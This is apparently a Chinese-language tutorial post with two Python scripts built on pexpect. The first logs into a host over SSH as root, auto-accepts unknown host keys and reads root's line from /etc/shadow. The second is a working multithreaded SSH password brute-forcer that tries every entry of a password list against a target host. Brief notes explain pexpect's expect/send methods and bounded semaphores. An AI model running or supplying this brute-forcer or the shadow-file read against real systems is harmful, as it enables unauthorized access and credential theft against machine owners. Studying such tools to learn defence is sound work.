这里是 CentOS 系统（Python）
# -*- coding: utf-8 -*-
# @Author : Lan126
import pexpect

# Prompt patterns that mark the end of a command's output (regexes for expect()).
PROMPT = ["# ", ">>> ", "> ", "\$ "]

# Text ssh prints on first contact with an unknown host key.
_HOST_KEY_PROMPT = "Are you sure you want to continue connecting"
# Password prompt pattern (character class: matches "password:" or "Password:").
_PASSWORD_PROMPT = "[p|P]assword:"
_CONNECT_ERROR = "[-] Error Connecting"


def connect(user, host, password):
    """Spawn ``ssh user@host``, answer its prompts and return the live session.

    Returns the ``pexpect.spawn`` child positioned just after the first shell
    prompt, or ``None`` (after printing an error) when the connection times out
    before a password prompt appears.  An unknown host key is accepted
    automatically by answering "yes", so host-key verification is bypassed.
    """
    session = pexpect.spawn("ssh " + user + "@" + host)
    matched = session.expect([pexpect.TIMEOUT, _HOST_KEY_PROMPT, _PASSWORD_PROMPT])
    if matched == 0:
        print(_CONNECT_ERROR)
        return None
    if matched == 1:
        # First contact with this host: accept the key, then wait for the password prompt.
        session.sendline("yes")
        if session.expect([pexpect.TIMEOUT, _PASSWORD_PROMPT]) == 0:
            print(_CONNECT_ERROR)
            return None
    session.sendline(password)
    session.expect(PROMPT)
    return session


def send_command(child, cmd):
    """Run *cmd* in the session and print everything printed before the next prompt."""
    child.sendline(cmd)
    child.expect(PROMPT)
    # NOTE(review): spawn() is called without encoding=, so on Python 3 pexpect
    # hands back bytes here and bytes has no .encode(); confirm the interpreter.
    output = child.before
    print(output.encode("utf-8"))


def main():
    """Log in to the local host as root and print root's /etc/shadow line."""
    target = "localhost"
    login = "root"
    # Placeholder literal on the page, not a real credential.
    secret = "*************************"
    session = connect(login, target, secret)
    # NOTE(review): connect() returns None on timeout; send_command() would then
    # raise AttributeError instead of reporting the failed login.
    send_command(session, "cat /etc/shadow | grep root")


if __name__ == "__main__":
    main()
下面是从 Pexpect 文档中复制的一段话，基本上能够归纳这一个脚本的全部知识点了。
There are two important methods in Pexpect – expect() and send() (or sendline() which is like send() with a linefeed).
The expect() method waits for the child application to return a given string. The string you specify is a regular expression,
so you can match complicated patterns. The send() method writes a string to the child application.
From the child’s point of view it looks just like someone typed the text from a terminal.
After each call to expect() the before and after properties will be set to the text printed by child application.
The before property will contain all text up to the expected string pattern. The after string will contain the text that was matched by the expected pattern.
spawn 类的作用如下：
This is the main class interface for Pexpect. Use this class to start and control child applications.
这里也是 CentOS 系统
# -*- coding: utf-8 -*- # @Author : Lan126 import optparse from pexpect import pxssh import time from threading import * maxConnections = 5 connection_lock = BoundedSemaphore(value=maxConnections) Found = False Fails = 0 def connect(host, user, password, release): global Found global Fails try: s = pxssh.pxssh() s.login(host, user, password) print("[+] Password Found " + password) Found = True except Exception as e: if "read_nonblocking" in str(e): Fails += 1 time.sleep(5) connect(host, user, password, False) elif "synchronize with original prompt" in str(e): time.sleep(1) connect(host, user, password, False) finally: if release: connection_lock.release() def main(): parser = optparse.OptionParser("usage%prog" + "-H <target host> -u <user> -F <password list>") parser.add_option("-H", dest="tgtHost", type="string", help="specify target host") parser.add_option("-u", dest="user", type="string", help="specify the user") parser.add_option("-F", dest="passwordFile", type="string", help="specify password file") options, args = parser.parse_args() host = options.tgtHost passwdFile = options.passwordFile user = options.user if host is None or passwdFile is None or user is None: print(parser.usage) exit(0) fn = open(passwdFile, "r") for line in fn.readlines(): if Found: # 若是发现了密码就退出 print("[*] Exiting: Password Found") exit(0) if Fails > 5: print("[!] Too Many Socket Timeouts") exit(0) connection_lock.acquire() password = line.strip("\r").strip("\n") print("[-] Testing: " + str(password)) t = Thread(target=connect, args=(host, user, password, True)) t.start() if __name__ == "__main__": main()
这其实也是上面那个脚本的更高级的封装，不过就是加了一个读取密码文件的过程而已。
这一个脚本的知识点有全局变量、信号量，以及 pxssh 模块的使用，它能够直接用 login() 等函数与 ssh 交互。
BoundedSemaphore 类了解一下：
A bounded semaphore implementation. Inherits from Semaphore.
This raises ValueError in release() if it would increase the value above the initial value.